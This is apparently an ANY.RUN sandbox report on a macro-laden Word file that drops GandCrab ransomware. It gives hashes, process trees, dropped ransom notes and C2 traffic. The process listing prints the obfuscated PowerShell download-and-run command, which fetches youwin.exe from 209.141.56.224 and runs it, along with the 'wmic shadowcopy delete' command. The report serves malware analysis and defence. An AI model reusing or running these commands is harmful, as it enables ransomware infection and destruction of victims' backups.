analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Emergеnсyexitmар.doc

Full analysis: https://app.any.run/tasks/9dadd907-118c-4dea-ad5c-b3ded1ba2281
Verdict: Malicious activity
Threats:

GandCrab is probably one of the most famous Ransomware. A Ransomware is a malware that asks the victim to pay money in order to restore access to encrypted files. If the user does not cooperate the files are forever lost.

Malware Trends Tracker     >>>
Analysis date: January 31, 2019, 11:39:23
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
ransomware
gandcrab
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: admin, Template: Normal.dotm, Last Saved By: Admin, Revision Number: 4, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Mon Jan 28 15:47:00 2019, Last Saved Time/Date: Mon Jan 28 15:48:00 2019, Number of Pages: 1, Number of Words: 11, Number of Characters: 66, Security: 0
MD5:

52DCBD94C557AE6431BB22C133C7AB40

SHA1:

EC1B71981FAE120E5D531288880FACF8D40B092D

SHA256:

A02894F2828618E5683D32C94350079CAC6DEABE3112F1A38F013086381E4395

SSDEEP:

384:gjzCFiSAoKXMVkGPEmRbpMJ8tcEEdi6O091cdjh8xrSFSX8Se0jrai1:arMVkDMbpgdi6l1jxrSFSX6oN

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • putty.exe (PID: 3020)

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3008)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2292)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3008)

    • Downloads executable files from IP

      • powershell.exe (PID: 2292)

    • GandCrab keys found

      • putty.exe (PID: 3020)

    • Actions looks like stealing of personal data

      • putty.exe (PID: 3020)

    • Writes file to Word startup folder

      • putty.exe (PID: 3020)

    • Changes settings of System certificates

      • putty.exe (PID: 3020)

    • Renames files like Ransomware

      • putty.exe (PID: 3020)

    • Deletes shadow copies

      • putty.exe (PID: 3020)

    • Dropped file may contain instructions of ransomware

      • putty.exe (PID: 3020)

    • Connects to CnC server

      • putty.exe (PID: 3020)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2292)

    • Creates files in the user directory

      • powershell.exe (PID: 2292)
      • putty.exe (PID: 3020)

    • Executes PowerShell scripts

      • cmd.exe (PID: 3652)

    • Creates files in the Windows directory

      • powershell.exe (PID: 2292)

    • Reads the cookies of Mozilla Firefox

      • putty.exe (PID: 3020)

    • Creates files in the program directory

      • putty.exe (PID: 3020)

    • Creates files like Ransomware instruction

      • putty.exe (PID: 3020)

    • Adds / modifies Windows certificates

      • putty.exe (PID: 3020)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3008)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3008)

    • Dropped object may contain TOR URL's

      • putty.exe (PID: 3020)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: ???????? Microsoft Word 97-2003
CompObjUserTypeLen: 32
HeadingPairs:
  • Название
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 76
Paragraphs: 1
Lines: 1
Company: Salve
CodePage: Windows Cyrillic
Security: None
Characters: 66
Words: 11
Pages: 1
ModifyDate: 2019:01:28 15:48:00
CreateDate: 2019:01:28 15:47:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 4
LastModifiedBy: Admin
Template: Normal.dotm
Keywords: -
Author: admin
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
7
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start winword.exe no specs cmd.exe no specs powershell.exe #GANDCRAB putty.exe wmic.exe vssvc.exe no specs notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3008"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\Emergеnсyexitmар.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3652c:\\windows\\system32\\cmd /c powershell $Rq6Er7D = '57087.66373351$D54cvV70T = 57087.66373351n57087.66373351e57087.66373351w57087.66373351-obj57087.66373351e57087.66373351c57087.66373351t n57087.66373351e57087.66373351t57087.66373351.w57087.66373351e57087.66373351b57087.66373351cli57087.66373351ent; $D54cvV70T.d57087.66373351o57087.66373351w57087.66373351n57087.66373351l57087.66373351o57087.66373351a57087.66373351d57087.66373351f57087.66373351i57087.66373351le(\"57087.66373351h57087.66373351t57087.66373351t57087.66373351p57087.66373351://209.141.56.224/youwin.exe\", \"c:\win57087.66373351dows\t57087.66373351emp\put57087.66373351t57087.66373351y57087.66373351.57087.66373351e57087.66373351x57087.66373351e\"); 57087.66373351s57087.66373351tar57087.66373351t-p57087.66373351r57087.66373351o57087.66373351ces57087.66373351s \"c:\win57087.66373351d57087.66373351o57087.66373351ws\temp\p57087.66373351u57087.66373351t57087.66373351t57087.66373351y.ex57087.66373351e\";'.replace('57087.66373351', $A3XhdAMlf);$iAxsKO45P = '';iex($Rq6Er7D);c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2292powershell $Rq6Er7D = '57087.66373351$D54cvV70T = 57087.66373351n57087.66373351e57087.66373351w57087.66373351-obj57087.66373351e57087.66373351c57087.66373351t n57087.66373351e57087.66373351t57087.66373351.w57087.66373351e57087.66373351b57087.66373351cli57087.66373351ent; $D54cvV70T.d57087.66373351o57087.66373351w57087.66373351n57087.66373351l57087.66373351o57087.66373351a57087.66373351d57087.66373351f57087.66373351i57087.66373351le(\"57087.66373351h57087.66373351t57087.66373351t57087.66373351p57087.66373351://209.141.56.224/youwin.exe\", \"c:\win57087.66373351dows\t57087.66373351emp\put57087.66373351t57087.66373351y57087.66373351.57087.66373351e57087.66373351x57087.66373351e\"); 57087.66373351s57087.66373351tar57087.66373351t-p57087.66373351r57087.66373351o57087.66373351ces57087.66373351s \"c:\win57087.66373351d57087.66373351o57087.66373351ws\temp\p57087.66373351u57087.66373351t57087.66373351t57087.66373351y.ex57087.66373351e\";'.replace('57087.66373351', $A3XhdAMlf);$iAxsKO45P = '';iex($Rq6Er7D);C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3020"C:\windows\temp\putty.exe" C:\windows\temp\putty.exe
powershell.exe
User:
admin
Company:
United Technologies
Integrity Level:
MEDIUM
Description:
Winword Twainambient Hagd 'computer Diagnose
2408"C:\Windows\system32\wbem\wmic.exe" shadowcopy deleteC:\Windows\system32\wbem\wmic.exe
putty.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3536C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1300"C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\YHZSNONEU-DECRYPT.txtC:\Windows\system32\NOTEPAD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 398
Read events
891
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
430
Text files
323
Unknown types
18

Dropped files

PID
Process
Filename
Type
3008WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR6A44.tmp.cvr
MD5:
SHA256:
2292powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1YU6524W7OUTYV58U7UP.temp
MD5:
SHA256:
3020putty.exeC:\PerfLogs\Admin\YHZSNONEU-DECRYPT.txttext
MD5:045034DDC83E7C7932412A6371C056DC
SHA256:966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4
2292powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:6073B6FC66D2E68644893344F6904E4A
SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3020putty.exeC:\$Recycle.Bin\S-1-5-21-1302019708-1500728564-335382590-1000\YHZSNONEU-DECRYPT.txttext
MD5:045034DDC83E7C7932412A6371C056DC
SHA256:966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4
3020putty.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\YHZSNONEU-DECRYPT.txttext
MD5:045034DDC83E7C7932412A6371C056DC
SHA256:966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4
3020putty.exeC:\YHZSNONEU-DECRYPT.txttext
MD5:045034DDC83E7C7932412A6371C056DC
SHA256:966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4
3020putty.exeC:\Program Files\YHZSNONEU-DECRYPT.txttext
MD5:045034DDC83E7C7932412A6371C056DC
SHA256:966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4
3008WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:1C9737B6B22A0A0C51A81C8161DFCE04
SHA256:5E1655BDA0BCCEA8122FA9956330777CD4B444C5B11BF13C53F2949E40FD92DC
3020putty.exeC:\Config.Msi\YHZSNONEU-DECRYPT.txttext
MD5:045034DDC83E7C7932412A6371C056DC
SHA256:966363663B77603773738D8D41C3D30EB9BC610D972A846E65E7D5C53DC65DA4
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2292
powershell.exe
GET
200
209.141.56.224:80
http://209.141.56.224/youwin.exe
US
executable
421 Kb
suspicious
3020
putty.exe
GET
301
46.30.41.117:80
http://www.kakaocorp.link/
RU
html
162 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2292
powershell.exe
209.141.56.224:80
FranTech Solutions
US
suspicious
3020
putty.exe
46.30.41.117:443
www.kakaocorp.link
Webzilla B.V.
RU
suspicious
3020
putty.exe
46.30.41.117:80
www.kakaocorp.link
Webzilla B.V.
RU
suspicious

DNS requests

Domain
IP
Reputation
www.kakaocorp.link
  • 46.30.41.117
malicious

Threats

PID
Process
Class
Message
2292
powershell.exe
A Network Trojan was detected
ET INFO Executable Download from dotted-quad Host
2292
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2292
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2292
powershell.exe
Potentially Bad Traffic
ET INFO SUSPICIOUS Dotted Quad Host MZ Response
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Emergеnсyexitmар.doc